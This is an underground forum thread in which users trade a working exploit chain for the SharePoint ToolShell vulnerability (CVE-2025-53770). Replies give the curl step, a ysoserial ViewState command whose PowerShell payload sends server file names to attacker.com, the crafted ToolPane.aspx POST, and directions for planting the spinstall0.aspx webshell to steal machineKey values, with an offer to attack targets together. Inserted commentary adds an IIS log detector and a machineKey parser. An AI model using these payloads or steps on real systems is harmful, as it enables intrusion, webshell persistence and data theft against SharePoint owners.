
(Toolshell) CVE-2025-53770 Exploit?

Knight
Largest Vendor
Premium
Registered: 10.09.2024
Messages: 180
Reactions: 123
Deal guarantor: 10
Deposit: 0.0115
Hello, is there a working exploit for this CVE? I have tested the most popular ones, but they don't work. Which one have you had success with? Or, better yet, a private one?

 
Have you tried using this?
https://github.com/soltanali0/CVE-2025-53770-Exploit

If that method didn’t work, try this one:

First, get the __VIEWSTATEGENERATOR value from the target SharePoint page:
Code:
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

Then, create a PowerShell ViewState payload using ysoserial.exe that lists a directory on the server and sends the filenames to an external URL:

Code:
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

Finally, add the generated token to a POST request like this to execute the command on the server:

Code:
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
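Added example, not code from the post above or from the linked repository: the request shape in that reply (a POST to ToolPane.aspx with DisplayMode=Edit and a Referer of /_layouts/SignOut.aspx) is exactly what a defender hunts for, so here is that pattern, together with the spinstall0.aspx webshell name that comes up later in this thread, as detection logic run over IIS W3C log lines. The log lines, IPs, host names and user names are constructed; the field layout follows the IIS #Fields header, where spaces inside a field are logged as '+' and an empty field as '-'.

```python
"""Flag the ToolShell request pattern and webshell hits in IIS W3C logs.

Added example (not from the thread). SAMPLE_LOG is constructed for
illustration; the field names are IIS's W3C extended format.
"""
import re
from urllib.parse import parse_qs

# Constructed sample: one benign page view, one ToolPane POST matching the
# request in the thread, one hit on the spinstall0.aspx webshell.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 03:12:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\alice 10.0.0.21 Mozilla/5.0 https://sp.corp.local/ 200
2025-07-19 03:12:09 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) /_layouts/SignOut.aspx 200
2025-07-19 03:12:15 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200
"""

TOOLPANE_RE = re.compile(r"^/_layouts/1[56]/toolpane\.aspx$", re.IGNORECASE)
SIGNOUT_RE = re.compile(r"/_layouts/(?:1[56]/)?signout\.aspx$", re.IGNORECASE)
# Webshell file name from the thread; extend the alternation for other names.
WEBSHELL_RE = re.compile(r"/_layouts/(?:1[56]/)?spinstall0\.aspx$", re.IGNORECASE)


def parse_iis_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("request line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated line: skip it rather than misalign the columns
        yield dict(zip(fields, values))


def classify(rec):
    """Return a rule name for a suspicious record, or None for a benign one."""
    stem = rec.get("cs-uri-stem", "")
    if WEBSHELL_RE.search(stem):
        return "spinstall0_webshell_access"
    if rec.get("cs-method") == "POST" and TOOLPANE_RE.match(stem):
        query = parse_qs(rec.get("cs-uri-query", ""))
        referer = rec.get("cs(Referer)", "-")
        edit_mode = query.get("DisplayMode", [""])[0].lower() == "edit"
        # Edit-mode ToolPane POST with a SignOut.aspx Referer is the ToolShell
        # auth-bypass shape; a normal editor session arrives from a page URL.
        if edit_mode and SIGNOUT_RE.search(referer):
            return "toolshell_toolpane_post"
    return None


def detect(text):
    """Return (rule, record) pairs for every suspicious line in an IIS log."""
    return [(rule, rec) for rec in parse_iis_w3c(text) if (rule := classify(rec))]


if __name__ == "__main__":
    for rule, rec in detect(SAMPLE_LOG):
        print(f"{rec['date']} {rec['time']} {rec['c-ip']} {rule} {rec['cs-uri-stem']}")
```

Run it against a real u_ex*.log and the only thing to adjust is the Referer column: if your site logs cs(Referer) with the full scheme and host, SIGNOUT_RE still matches because it anchors on the path suffix only.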
 
Thanks for the information! I'll try it and let you know. Thanks again!
 
What about --validationkey="<VALIDATION_KEY>" and --validationalg="<VALIDATION_ALG>"? How do you get them?
 
On SharePoint, those only matter if you actually have the machineKey from the server. Without that, any ViewState you generate gets rejected: the MAC check fails before anything runs. How to get the keys? It's straightforward:

1. Upload an .aspx webshell (like spinstall0.aspx) to an executable path like /LAYOUTS/.

2. Use it to read this file:

Code:
C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\CONFIG\web.config

Inside you'll usually see something like:

Code:
<machineKey
  validationKey="ABCDEF1237272727272..."
  validation="SHA1"
/>

Take that, generate a signed ViewState using ysoserial.net, and inject it into a writable endpoint like /ToolPane.aspx. If the MAC matches, your payload executes. If you've got a SharePoint target, we can take a look at it together.
Knight, my jabber: blackhuntdev@exploit.im
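An added example, not code from the reply above: a parser for the machineKey element that reply tells you to look for, with the sanity checks a practitioner runs on the values before handing them to ysoserial.net (the validation key must be 40 to 128 hex characters or ASP.NET would not load the config, and an AutoGenerate value means the file holds no key bytes at all, so reading web.config alone gets you nothing). The two web.config fragments are constructed; the element and attribute names are the real ASP.NET ones. Besides the hive path quoted in the reply, the web application's own web.config under its IIS virtual directory (C:\inetpub\wwwroot\wss\VirtualDirectories\<port>\) is where SharePoint sets the farm's machineKey, and the function takes whichever file's contents you hand it.

```python
"""Parse the <machineKey> element from an ASP.NET web.config and sanity-check it.

Added example (not from the thread). Both config fragments are constructed.
"""
import xml.etree.ElementTree as ET

# Constructed sample: explicit keys, as SharePoint sets them so every
# front-end in the farm accepts the same signed ViewState.
EXPLICIT_KEY_CONFIG = """\
<configuration>
  <system.web>
    <machineKey
      validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
      decryptionKey="0123456789ABCDEF0123456789ABCDEF"
      validation="SHA1"
      decryption="AES" />
  </system.web>
</configuration>
"""

# Constructed sample: the ASP.NET AutoGenerate setting, where the file
# holds no key bytes at all.
AUTOGEN_CONFIG = """\
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps" />
  </system.web>
</configuration>
"""

ATTRS = ("validationKey", "decryptionKey", "validation", "decryption")
HEX = set("0123456789abcdefABCDEF")


def extract_machine_key(config_text):
    """Return the machineKey attributes as a dict, or None if the element is absent.

    Iterating over the tree instead of using a fixed path keeps this
    independent of where the element sits (system.web or a <location> wrapper).
    """
    root = ET.fromstring(config_text)
    node = next(root.iter("machineKey"), None)
    if node is None:
        return None
    return {name: node.get(name) for name in ATTRS}


def audit_machine_key(mk):
    """Describe what the element gives someone who has read it."""
    findings = []
    vk = mk.get("validationKey") or ""
    alg = mk.get("validation") or "(not set)"
    if vk.startswith("AutoGenerate"):
        findings.append("validationKey=AutoGenerate: no key material in this file, "
                        "reading web.config is not enough")
    elif not (40 <= len(vk) <= 128 and set(vk) <= HEX):
        findings.append("validationKey is not 40-128 hex chars; ASP.NET rejects this config")
    else:
        findings.append(f"validationKey present: {len(vk) // 2} bytes, validation={alg}; "
                        "a holder of this key can MAC a ViewState the server accepts")
    dk = mk.get("decryptionKey") or ""
    if dk and not dk.startswith("AutoGenerate"):
        findings.append(f"decryptionKey present: {len(dk) // 2} bytes, "
                        f"decryption={mk.get('decryption') or '(not set)'}")
    return findings


if __name__ == "__main__":
    for label, text in (("explicit", EXPLICIT_KEY_CONFIG), ("autogen", AUTOGEN_CONFIG)):
        for line in audit_machine_key(extract_machine_key(text)):
            print(f"[{label}] {line}")
```

The same fact cuts the other way for defenders: a ViewState signed with a leaked key stays valid until the key changes, which is why Microsoft's remediation guidance for this CVE was to rotate the SharePoint machine keys after patching, not just to patch.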
 
TOX? If you have Tox, please leave it in the forum messenger, or if that's unsafe, on exploit.in my profile is NightRaider.
 

